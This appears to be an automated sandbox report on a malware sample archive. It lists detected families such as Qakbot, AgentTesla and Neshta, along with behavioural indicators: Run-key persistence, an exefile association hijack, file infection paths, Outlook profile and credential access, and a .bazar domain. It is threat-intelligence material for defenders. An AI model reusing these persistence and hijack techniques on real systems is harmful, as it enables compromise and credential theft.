Analysis Overview
Threat Level: Known bad
The file https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z was found to be: Known bad.
Malicious Activity Summary
ostap
Formbook
Qakbot/Qbot
Oblique family
Lokibot family
Neshta family
Ostap JavaScript downloader
Ardamax main executable
Ostap family
AgentTesla
Ardamax family
Ardamax
Neshta
ObliqueRAT
Qakbot family
Agenttesla family
BazarBackdoor
Lokibot
Formbook family
Bazarbackdoor family
Detect Neshta payload
Formbook payload
Renames multiple (183) files with added filename extension
Tries to connect to .bazar domain
Blocklisted process makes network request
Adds policy Run key to start application
Drops file in Drivers directory
Drops startup file
Executes dropped EXE
Reads data files stored by FTP clients
Unexpected DNS network traffic destination
Modifies system executable filetype association
Reads user/profile data of local email clients
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Loads dropped DLL
Reads WinSCP keys stored on the system
Accesses Microsoft Outlook profiles
Adds Run key to start application
Network Service Discovery
Network Share Discovery
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Detects Pyinstaller
System Location Discovery: System Language Discovery
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
Program crash
Command and Scripting Interpreter: JavaScript
outlook_win_path
Suspicious behavior: AddClipboardFormatListener
Runs net.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies registry key
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Modifies registry class
Modifies Control Panel
outlook_office_path
Modifies Internet Explorer settings
Gathers network information
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Enumerates system info in registry
Discovers systems in the same network
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-19 14:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-19 14:00
Reported
2024-11-19 14:20
Platform
win11-20241007-en
Max time kernel
1200s
Max time network
1203s
Command Line
Signatures
AgentTesla
Agenttesla family
Ardamax
Ardamax family
Ardamax main executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
BazarBackdoor
| Description | Indicator | Process | Target |
| N/A | zirabuo.bazar | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Bazarbackdoor family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Formbook
Formbook family
Lokibot
Lokibot family
Neshta
Neshta family
Oblique family
ObliqueRAT
Ostap JavaScript downloader
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ostap family
Qakbot family
Qakbot/Qbot
ostap
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (183) files with added filename extension
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\4HTPPL0HYBD = "C:\\Program Files (x86)\\M2d9\\IconCache3frdbf.exe" | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\cscript.exe | N/A |
Blocklisted process makes network request
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
Tries to connect to .bazar domain
| Description | Indicator | Process | Target |
| N/A | zirabuo.bazar | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\script.lnk | C:\Users\Public\Video\hrss.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\update.exe | C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-T~1.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TSH Start = "C:\\PROGRA~3\\QQOFCC\\TSH.exe" | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\upgrade = "C:\\Users\\Admin\\AppData\\Local\\main.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\btqpkjb = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Mxnpxnryiygd\\sbozxh.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
Network Share Discovery
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe | C:\Users\Admin\Desktop\HEUR-T~4.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2076 set thread context of 3532 | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | C:\Users\Admin\Desktop\HEUR-T~3.EXE |
| PID 3532 set thread context of 3284 | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | C:\Windows\Explorer.EXE |
| PID 1040 set thread context of 2060 | N/A | C:\Users\Admin\Desktop\HEUR-B~1.EXE | C:\Users\Admin\Desktop\HEUR-B~1.EXE |
| PID 3796 set thread context of 4368 | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe |
| PID 4368 set thread context of 3284 | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | C:\Windows\Explorer.EXE |
| PID 2476 set thread context of 3156 | N/A | C:\Users\Admin\Desktop\HEUR-T~1.EXE | C:\Users\Admin\Desktop\HEUR-T~1.EXE |
| PID 1968 set thread context of 1444 | N/A | C:\Users\Admin\Desktop\HEUR-T~4.EXE | C:\Users\Admin\Desktop\HEUR-T~4.EXE |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\identity_helper.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\Installer\setup.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\ipconfig.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\arp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Video\frame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\whoami.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\BACKDO~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-E~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\REG.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\route.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netstat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
